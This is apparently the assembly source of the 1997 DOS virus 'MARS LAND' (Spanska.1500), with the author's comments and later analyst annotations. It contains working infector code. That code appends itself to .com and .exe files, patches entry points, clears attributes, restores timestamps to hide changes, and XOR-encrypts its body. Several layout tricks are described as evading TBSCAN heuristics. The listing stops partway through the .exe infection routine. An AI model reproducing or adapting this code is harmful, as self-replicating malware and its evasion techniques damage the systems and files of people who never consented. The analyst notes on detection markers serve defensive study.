; MARS LAND virus by Spanska
; Called Spanska.1500 by AV people
; This is my third virus
;
;*********************************************************************
;
; THIS VIRUS IS DEDICATED TO... uhhh... nobody this time :)
;
; Or maybe to all the virus coders who do not destruct with
; their creations. I've put the phrase "Coding a virus can
; be creative" to show that an original infection routine,
; a funny payload or a new mutation engine, are far more
; interesting for the coder and for other people than stupid
; destruction.
; I worked some weeks on this virus graphic effect. A simple
; routine to delete a hard drive would have taken me one
; minute to copy/paste it. So, no interest.
;
; Greets to Griyo (best virus coder on this side of the
; galaxy), MrSandman and other guys from 29A (the best group!),
; to Roadkill, Slacker, and friends on IRC (from Luxembourg,
; Spain, Sweden and everywhere), Poltergst and Cicatrix for
; their job on the web. And to the very few french virus
; coders, or even fighters (salut Jean-Luc!).
;
;******************************contact me at el_gato@rocketmail.com***
;
; At the time it was released (march 97), the detection was:
; TBSCAN flags: c?K on .exe's, nothing on .com's
; FPROT: "ear variant" on unencrypted generation 0, nothing after
; DrSolly Findvirus: nothing
; DrWeb: nothing
; AVP: nothing
; (i saw in newsgroups that a scanner i can't remember flags it
; sometimes like a Whale variant, never happened to me)
;
; generation zero size: 1660
; virus size: 1500
;
; compile it with TASM /m2 and TLINK /t
;
; Properties:
; simple .com/.exe runtime infector
; file search routine is essentially derived from my NO PASARAN virus
; not destructive
; encrypted with variable key
; infects 3 .com and 3 .exe each run
; infects current directory, then upper directories
; when it reaches the root, it starts infecting all "level1" subdirectories
; does not infect files <500 bytes, nor command.com
; the VGA graphic bomb (a 3D voxel effect) explodes
; when minutes=30 and seconds<30 (1/120)
; TASM tiny-model layout: a single segment holds code and data with
; origin 100h (.com style), and cs, ds, es and ss are assumed equal.
; That assumption only holds for a .com host; the entry code in `virus`
; re-derives ds/es from cs so the same body also runs from an .exe host.
code segment
assume ds:code, ss:code, cs:code, es:code
org 100h
;
;---------------fake host code--------------------
;
;----------------------------------------------------------------------
; hote: generation-0 "host" stub. It exists only so the virus has
; something to return to. Its first five bytes -- a 3-byte CALL followed
; by the 2-byte "ee" tag -- are exactly the prefix that the infection
; code later writes over the start of an infected .com (see the
; cinq_octets build below: E8, rel16, "ee").
; Analyst note: E8 xx xx 65 65 at offset 0 of a .com is therefore a
; static marker of this family; the virus presumably also keys on "ee"
; to skip already-infected files (inside ouvre_et_verif_header, which is
; not in view). After the virus returns here, the stub terminates via
; DOS function 4Ch with exit code 0.
;----------------------------------------------------------------------
hote:
call virus ;jump to viral code (avoid J flag)
signature db "ee" ;virus signature
nop ;
nop ;fake host
nop ;
nop ;
mov ah, 4ch ;finished
mov al,0 ;go to
int 21h ;DOS
;**********************************************************************
; START OF VIRAL CODE
;**********************************************************************
;----------------------------------------------------------------------
; virus: entry point reached by the host's CALL.
; On entry cs is the segment the body was loaded into; ds/es are not
; trusted (for an .exe host they do not equal cs). The original ds is
; pushed and deliberately left on the stack for the host-restoration
; code (not in view); es and ds are then both set to cs.
; Delta offset: `call $+3` pushes the run-time address of `delta`;
; subtracting the assemble-time `offset delta` yields the relocation
; delta, kept in bp and used by every [bp+offset x] reference below.
; The pushed return slot is patched to point at `decrypte`, so the final
; `ret` acts as a jump to the decryptor without a visible jmp/call
; (an anti-heuristic layout trick against TBSCAN's "E" flag, per the
; author's comments). Clobbers ax, bp, ds, es; leaves one extra word
; (the saved ds) on the stack.
;----------------------------------------------------------------------
virus: ;virus starts here
;
;-------------in case of an exe, let's work in cs--------------
;
push ds ;save ds on stack... Don't forget it...
push cs ;we are in the virus segment
push cs ;so we have to adjust
pop es ;ds and es to point
pop ds ;to this segment
;
;---------------get delta offset----------------------------
;
call $+3 ;modified classic
delta: ;routine to
mov bp, sp ;avoid flag E
mov ax, [bp] ;ax = run-time address of delta (the pushed return slot)
add word ptr [bp], decrypte-delta ;retarget the return slot to decrypte
sub ax, offset delta ;ax = run-time - assemble-time = delta offset
mov bp, ax ;bp = delta offset for all [bp+offset x] references
ret ;"returns" into decrypte
; clef: the single-byte XOR key for the encrypted zone. It is rewritten
; by change_clef before each infection (routine not in view), so infected
; files carry different keys; no mutation of the decryptor itself is
; visible in this listing, only the key byte varies.
clef db 0 ;the crypting key
;=== this stosb ===
;=== when outside decrypt loop ===
;=== does not flag # ===
; baise_flag_cryptage: one-instruction subroutine (stosb; ret) that is
; the store half of the decrypt loop. Moving the store out of the loop
; body changes nothing semantically -- the loop is still
; lodsb / xor / stosb -- it only defeats TBSCAN's pattern-based "#"
; ("decryptor found") heuristic. A scanner that emulates the loop rather
; than matching its instruction shape is not affected by this layout.
; In: al = byte to store, es:di = destination. Out: di advanced by 1.
baise_flag_cryptage: ;===
stosb ;=========>>> NO MORE FLAG "#" !!!!!
ret ;===
;===================================
;
;----------------------decrypting routine-------------------------
;
; decrypte: in-place XOR decryption of [debut_cryptage, fin_cryptage)
; with the one-byte key stored at clef. Reached through the patched
; return in `virus`; falls through into the decrypted body when done.
; In:  bp = delta offset; ds = es = cs.
; Clobbers: ax, cx, dx, si, di, flags.
; Analyst note: this stub sits before debut_cryptage and is therefore
; stored in clear on disk; together with the entry/delta code above it
; is the natural static detection point, since only the key byte varies
; between infected files. Because the cipher is a single-byte XOR, the
; body can be recovered directly from the clef byte (or by trying all
; 256 keys).
decrypte:
mov dl, [bp+offset clef] ;actual key in dl
mov cx, fin_cryptage - debut_cryptage ;number of bytes to decrypt
lea si, [bp+offset debut_cryptage] ;si=start of zone to decrypt
mov di, si ;di=start of zone to decrypt
xor_loop: ;decrypt loop
lodsb ;get byte to decrypt in al
nop ;just here to make a 1500 bytes virus ;)
xor al, dl ;the byte is decrypted with the key
call baise_flag_cryptage ;call the outside stosb (avoid flag #)
loop xor_loop ;finish decryption
debut_cryptage: ;start of the crypted zone
;
; Everything from here to fin_cryptage is stored XOR-encrypted on disk
; and executes only after `decrypte` has rewritten it in place.
; This run is the .com-infection pass:
;   1) copy the 8 saved host-header words pip -> vip so the current
;      host can still be restored after pip is overwritten while
;      infecting a new .exe;
;   2) zero the three byte counters starting at phase;
;   3) record the current directory (DOS 47h) and move the DTA into
;      the virus's own buffer (DOS 1Ah);
;   4) walk *.com with 4Eh/4Fh; skip names with "MM" at characters 3-4
;      (the command.com filter), clear attributes, open and check the
;      header, and for a qualifying file append the body and overwrite
;      its first 5 bytes with E8 <size-3> "ee";
;   5) after 3 .com infections continue with the .exe pass.
; bp = delta offset throughout. bx is assumed to hold the file handle
; after ouvre_et_verif_header (not visible here -- unlike the .exe pass,
; this pass never reloads it from `handle`; TODO confirm).
; Helpers outside this view: verifie_extension, attrib_a_zero,
; ouvre_et_verif_header, change_clef, infecte, pointeur_debut,
; ecrit_fichier, restaure_time, remise_en_etat.
;
;------transfert of infected file information on another zone---------
; (for final normal execution of the program)
; pip receives the host's IP/CS/SS/SP during .exe infection; vip is the
; copy kept for restoring this host.
;
lea si, [bp+offset pip] ;from this zone
lea di, [bp+offset vip] ;to this zone
movsw
movsw ;we transfer 8 bytes
movsw
movsw
;
;---------------initialisation to 0 of directory counter--------------
; and 2 infection counters (com and exe)
; stosw + stosb clear 3 consecutive bytes: phase, then (presumably)
; compteur_com and the .exe counter, which is not referenced in view.
;
lea di, [bp+offset phase] ;they are here
xor ax, ax ;put them to zero
stosw ;(3 counters = 3 bytes)
stosb
;
;--------------------remember current repertory------------------
;
lea si, [bp+offset repert] ;si on good memory zone
xor dl, dl ;dl=0 = current drive for function 47h
mov ah, 47h ;47h=current dir in memory
int 21h ;go!
;
;---------------DTA go to a predefined zone in memory-------------
; push/pop instead of `mov ax, 1A00h` has no functional effect; it only
; hides the immediate from TBSCAN's "F" heuristic, per the author.
;
push 1a00h ;push/pop to
pop ax ;avoid flag F
lea dx, [bp+offset dta]
int 21h
;**********************************************************************
; .COM INFECTION
;**********************************************************************
;
;-----------------find first .com file-------------------------
; cx = 0007h includes read-only, hidden and system files in the search.
;
recherche:
mov cx, 0007h ;attributes
lea dx, [bp+offset file_com] ;file mask for a .com
mov ax, 4e00h ;4eh=find first file
int 21h ;file found?
jnc sauter_suivant ;yes => c=0, let's continue
jmp infecte_exe ;no => go to .exe infection
;
;---------------------find next .com file-------------------------
;
fichier_suivant:
lea dx, [bp+offset file_com] ;
mov ax, 4f00h ;4Fh=find next file
mov cx, 0007h
int 21h ;file found?
jnc saut5 ;yes => c=0, let's continue
jmp infecte_exe ;no => go to .exe infection
saut5:
;
;---------------verify if extension is really .com---------------------
; (it's made to avoid flag S with tbscan)
; The immediate "MO" is stored little-endian, so the test requires the
; bytes 'O','M' at [si]; si is set by verifie_extension (not in view)
; and presumably points at the 2nd character of the extension.
;
sauter_suivant:
call verifie_extension ;call verification routine
cmp word ptr [si], "MO" ;second and third letters are "OM"?
jne fichier_suivant ;no => find next .com file
;
;----------------verify if it's command.com----------------------------
; The found name starts at dta+1Eh; +2 selects characters 3-4. "MM"
; matches COMMAND.COM, but also any other name with "MM" there.
;
cmp word ptr [bp+offset dta+1eh+2], "MM" ;test 3rd and 4th letter
je fichier_suivant ;yes => find next file
;
;--------------attributes to 0 to infect special files-------------
;
call attrib_a_zero
;
;--------------------open file, and verify header-----------------------
; Control-flow trick: the helper presumably adjusts its own return
; address (as `virus` does) so that a qualifying file skips the jmp.
;
call ouvre_et_verif_header
jmp fichier_suivant ;if header not good (already infected)
;we get here and search another file
;if header good we get here on routine return
;
;--------transfer 5 first bytes of the .com to another zone----------
; exehead presumably holds the header bytes read by the open routine;
; the original 5 bytes are kept for restoring the host in memory.
;
lea si, [bp+offset exehead]
lea di, [bp+offset cinq_octets]
movsw
movsw
movsb
;
;-----------before infection, change of the crypting key-----------
;
call change_clef
;
;------------disk file pointer at the end-----------
; 4202h = seek relative to end, cx:dx = 0; bx (handle) is not reloaded.
;
mov ax, 4202h
xor cx, cx
mov dx, cx
int 21h
;
;-----------------------infection-----------------------------------
; infecte (not in view) presumably writes the body at the end position.
;
call infecte
;
;--overwrite 5 first bytes on the disk by jump to virus code + signature---
;
;1) move disk file pointer to start of the file
;
call pointeur_debut
;
;2) calculate initial jump and write all on a temp zone in memory
; CALL rel16 is relative to the end of the 3-byte instruction at 100h,
; and the appended body starts at 100h+size, so the displacement is
; size-3. Only the low word of the DTA size (dta+1Ah) is used, which is
; sufficient for a .com (at most 64 KiB). The resulting 5-byte pattern
; E8 xx xx 65 65 is the on-disk marker of an infected .com.
;
lea di, [bp+offset cinq_octets]
mov al, 0E8h ;E8=opcode of CALL
stosb
mov ax, word ptr [bp+offset dta+1ah] ;ax=file size
sub ax, 3 ;this is because of the CALL
stosw
mov ax, "ee" ;signature
stosw
;
;3) overwrite 5 first bytes on the file
;
mov cx,5
lea dx, [bp+offset cinq_octets]
call ecrit_fichier
;
;----------------restore time/date of the file--------------------
;
call restaure_time
;
;------------close file and restore file attributes--------------------
;
call remise_en_etat
;
;--------verify how many .com files we have infected------------------
; The incremented count is written back only while it is below 3;
; reaching 3 branches straight to the .exe pass.
;
mov byte ptr cl, [bp+offset compteur_com] ;infection counter in cl
inc cl ;one more
cmp cl, 3 ;have we infected 3 .com files?
je infecte_exe ;yes => let's infect .exe now
mov byte ptr [bp+offset compteur_com], cl ;no => write new value of counter
;
;-----------------let's infect a new .com file------------------
;
jmp fichier_suivant ;go infect next file
;**********************************************************************
; .EXE INFECTION
;**********************************************************************
infecte_exe:
;
;------------------find first .exe file-------------------------
;
recherche_exe:
mov cx, 0007h ;attributes
lea dx, [bp+offset file_exe] ;file mask for a .exe
mov ax, 4e00h ;4eh=find first file
int 21h ;file found?
jnc sauter_exe_suivant ;yes => c=0, let's continue
jmp rep_sup ;no => go to upper directory
;
;------------------find next file-------------------------
;
exe_suivant:
lea dx, [bp+offset file_exe] ;file mask for a .exe
mov ax, 4f00h ;4Fh=find next file
mov cx, 0007h ;attributes
int 21h ;file found?
jnc saut_exe ;yes => c=0, let's continue
jmp rep_sup ;no => go to upper direcory
saut_exe: ;
;
;---------------verify if extension is really .exe---------------
; (it's made to avoid flag S with tbscan)
;
sauter_exe_suivant:
call verifie_extension ;call verification routine
cmp word ptr [si], "EX" ;second and third letters are "OM"?
jne exe_suivant ;no => find next .exe file
;
;------------attributes to 0 to infect special files-------------
;
call attrib_a_zero
call ouvre_et_verif_header
jmp exe_suivant ;if header not good (already infected or
;windows file) we get here and search
;another file
;if header good, we get here
;
;------------verify that it's really a .exe with MZ header----------------
;
lea si, [bp+offset exehead]
lodsw
add ah, al ;to avoid flag Z
cmp ah, 167 ;(M+Z in ASCII is 167)
jne exe_suivant ;if it's not MZ or ZM, find next .exe file
;
;-----------before infection, change the crypting key-----------
;
call change_clef
;
;----------------save old .exe header values-------------------------
;
lea di, [bp+offset pIP]
mov ax, word ptr [bp+ exehead+14h] ;save IP
stosw
mov ax, word ptr [bp+ exehead+16h] ;save CS
stosw
mov ax, word ptr [bp+ exehead+0Eh] ;save SS
stosw
mov ax, word ptr [bp+ exehead+10h] ;save SP
stosw
;
;---------disk file pointer at the end (return dx:ax = size)---------
;
mov bx, [bp+offset handle]
mov ax, 4202h
xor cx, cx
xor dx, dx
int 21h
push ax ;save size on stack
push dx ;useful for next calculations
;
;----------------calculate new cs:ip---------------------------------
;
push ax
mov ax, word ptr [bp+exehead+08h]
mov cl, 4
shl ax, cl
mov cx, ax
pop ax
sub ax, cx
sbb dx, 0
mov cl, 0Ch
shl dx, cl
mov cl, 4
push ax
shr ax, cl
add dx, ax
shl ax, cl
pop cx
sub cx, ax
mov word ptr [bp+ exehead+14h], cx ;new calculated values
mov word ptr [bp+ exehead+16h], dx ;put in the header zone
mov word ptr [bp+ exehead+0Eh], dx ;in memory
mov word ptr [bp+ exehead+10h], 0FFFEh
;